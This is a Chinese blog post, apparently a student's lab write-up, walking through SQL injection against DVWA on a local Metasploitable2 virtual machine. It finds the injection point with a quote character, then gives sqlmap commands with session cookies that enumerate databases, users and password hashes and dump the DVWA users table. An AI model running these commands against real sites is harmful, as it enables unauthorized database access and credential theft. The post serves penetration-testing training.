网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)

已于 2024-06-09 20:59:08 修改
阅读量1.8k 收藏 12
点赞数 1
分类专栏: 网络渗透测试 文章标签: sql 数据库
于 2022-11-21 20:54:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzfff__/article/details/127944065
版权

实验环境搭建。启动Metasploitable2虚拟机。

1.输入账号密码【msfadmin】,输入【ip a】查询ip

 2.打开浏览器,输入该ip,进入DVWA

 输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客http://t.csdn.cn/CyHBX

 3.注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1,返回

ID: 1

First name: admin

Surname: admin

返回正常;

再次输入1',报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)

获得注入点:http://192.168.113.130/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#

下面利用SQLMap进行注入攻击。首先要将DVWA安全级别设置为最低

 4.获取cookie值,security=low; PHPSESSID:"d98f305711aa718acfa4c95c71fefd7e"

【F12】

 实战1:枚举登录MYSQL数据的用户名与密码

 sqlmap语法参数:

  • -u :指定目标URL,即注入点
  • --cookies:当前会话的cookies值
  • -b:获取数据库类型,检索数据库管理系统标识
  • --current-db:获取当前数据库
  • --current-user:获取当前登录数据库使用的用户

输入【sqlmap -u"http://192.168.113.130/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie='security=low; PHPSESSID=356e26c24f2a64655c4bef4d598ddc76' -b --current-db --current-user】然后根据提示回复Y,红色部分为注入点的URL,蓝色部分为自己的cookie值,然后就等吧,这是一个等待的过程,我等了好久才出现的!

结果:得到当前数据库为dvwa,使用的用户为root@%

实战2:枚举所有数据库

   sqlmap语法参数:

  • --users:枚举数据库用户名
  • -password:枚举数据库用户的密码(hash)

输入【sqlmap -u "http://192.168.113.130/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie "security=low;PHPSESSID=356e26c24f2a64655c4bef4d598ddc76" --string="Surname" --users --password】 

实战3:枚举数据库

   sqlmap语法参数:

  • --dbs:枚举当前数据库

输入【sqlmap -u "http://192.168.113.130/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie "security=low;PHPSESSID=356e26c24f2a64655c4bef4d598ddc76" --string="Surname" --dbs】

结果:mysql下所有的数据库

实战4:枚举指定数据库的数据表

 -D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

输入【sqlmap -u "http://192.168.113.130/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie "security=low;PHPSESSID=356e26c24f2a64655c4bef4d598ddc76" --string="Surname" -D dvwa --tables】

结果:dvwa库中,所有的表

实战5:获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

输入【sqlmap -u "http://192.168.113.130/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie "security=low;PHPSESSID=356e26c24f2a64655c4bef4d598ddc76" --string="Surname" -D dvwa -T users --columns】

实战6:枚举指定数据表中的所有用户名与密码,并down到本地

-C:枚举数据表中的列

--dump:存储数据表项

输入【sqlmap -u "http://192.168.113.130/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie "security=low;PHPSESSID=356e26c24f2a64655c4bef4d598ddc76" -D dvwa -T users -C user,password --dump】 

_read_
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用SQLmap实现 SQL 注入
m0_71805735的博客
06-21 2313
利用SQLmap实现 SQL 注入
sqlmap详细教程
简介
01-04 3178
SQLmqp教程!
数据库测试】SQL注入测试——一般步骤方法
u013177528的博客
04-24 814
SQL注入是一种常见的网络攻击手段,攻击者通过在Web应用程序的输入字段中注入恶意SQL代码,来利用不安全的数据库查询。SQL注入测试的目的是验证应用程序是否能够抵御这类攻击。SQL注入测试是Web应用安全测试的重要组成部分,它有助于确保应用程序的安全性和数据的完整性。记录测试过程中发现的所有问题,并与开发团队合作修复这些漏洞。
Web安全基础学习:SQL注入漏洞之Mysql注入
最新发布
qq_51862722的博客
06-18 923
SQL注入SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
SQL注入原理及DVWA实战
qq_43535990的博客
11-01 695
SQL注入原理及DVWA实战一、SQL注入原理二、测试实例三、DVWA实战 一、SQL注入原理 要理解SQL注入的原理,就必须了解能够对数据库中的信息进行增删改查的SQL语言。Sql 注入攻击就是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。当然,根据数据库版本类型的不同,相应的注入语句也有所不同,这需要我们去了解学习。 二、测试实例 需要用到的知识:PHP语言,Apache Web服务器,MySQL数据
渗透测试sql注入
weixin_46420165的博客
12-08 2174
SQL 注入SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息
Sqlmap实验
ch258563的博客
03-17 104
Sqlmap实验
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 4534
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
网络安全 | 渗透工具】SQLmap加密注入教程+实战详析
等风来
08-02 6073
在使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。表示只对该参数进行注入测试,不加 * 的话还会测试其他参数是否为注入,增加时间。选择默认选项,跑sqlmap的时候加上这句话可节约时间、不需要回复提示
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
信安网络渗透测试实验三.docx
12-15
1. DVWA+SQLmap+Mysql 注入实战实验环境搭建。 2. 启动 Metasploitable2 虚拟机。 3. 注入发现:判断是否有注入漏洞。 4. 利用 SQLMap 进行注入攻击。 5. 枚举当前使用的数据库名称和用户名。 三、实验过程: ...
学习之sql注入漏洞网址的创建
06-06
3. 修改dvwa源码:找到与SQL注入相关的页面,如dvwa/vulnerabilities/sqli-literal/,修改其查询代码,增加易受攻击的。 4. 验证注入:在浏览器中输入修改后的URL,尝试输入SQL注入语句,观察是否能得到预期的结果...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
天津理工大学信息安全专业网络攻防实验3-Web攻击与防御
11-28
此次实验不仅提供了实战经验,也强化了理论知识,如SQL注入的分类、工作原理和检测方法。通过使用sqlmap工具,我们学习了如何识别和利用SQL注入漏洞,以及如何防止此类攻击。同时,实验也让我们意识到网络安全是一个...
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4708
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
sqlmap注入实战教程(图文详解)
热门推荐
weixin_49071539的博客
12-18 2万+
此教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具,sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
sqlmap实战 简单的注入学习
qq_43355651的博客
11-29 557
本人是网络安全的在校学生 为了使自己更好的学习和坚持决定记录一下 希望一次次的记录可以使自己慢慢变强 自己最近在学习安全的重要工具------sqlmap,因为初次学习,为了更好的熟悉和方便,在自己本机上安装了sqlmap(未使用kali Linux)。sqlmap是一个自动化的sql注入工具,主要功能是扫描发现并利用注入漏洞。 本文为学习笔记,仅限于学习交流,不得从事违反法律相关的内容...
SQL注入MYSQL注入
av11566的博客
04-19 7100
前言 MYSQL注入中首先要明确当前注入权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息数据库中符号"
渗透测试——SQL注入实验Sqlmap
YT的博客
02-11 6352
实验环境实验中,OWASP Web服务器靶机(10.10.10.129,对外公开域名:www.dvssc.com)含有 SQL注入漏洞,在攻击机 BT5 R1 (10.10.10.128)上通过工具进行攻击。 工具:sqlmap、Firefox浏览器内置的 Tamper Data 1. 输入 www.dvssc.com (或10.10.10.129) 登录要攻击的网站,击登录界面 2....
dvwa sql注入 sqlmap
10-31
DVWA是一个用于演示Web应用程序安全漏洞的虚拟机,其中包括了SQL注入漏洞。而SQLMap是一款自动化的SQL注入工具,可以用于检测和利用SQL注入漏洞。在使用SQLMap进行DVWA SQL注入时,可以通过获取数据库名称、表名、列名等信息,进而进行数据的读取、修改、删除等操作。具体使用方法可以参考引用中提供的链接和命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值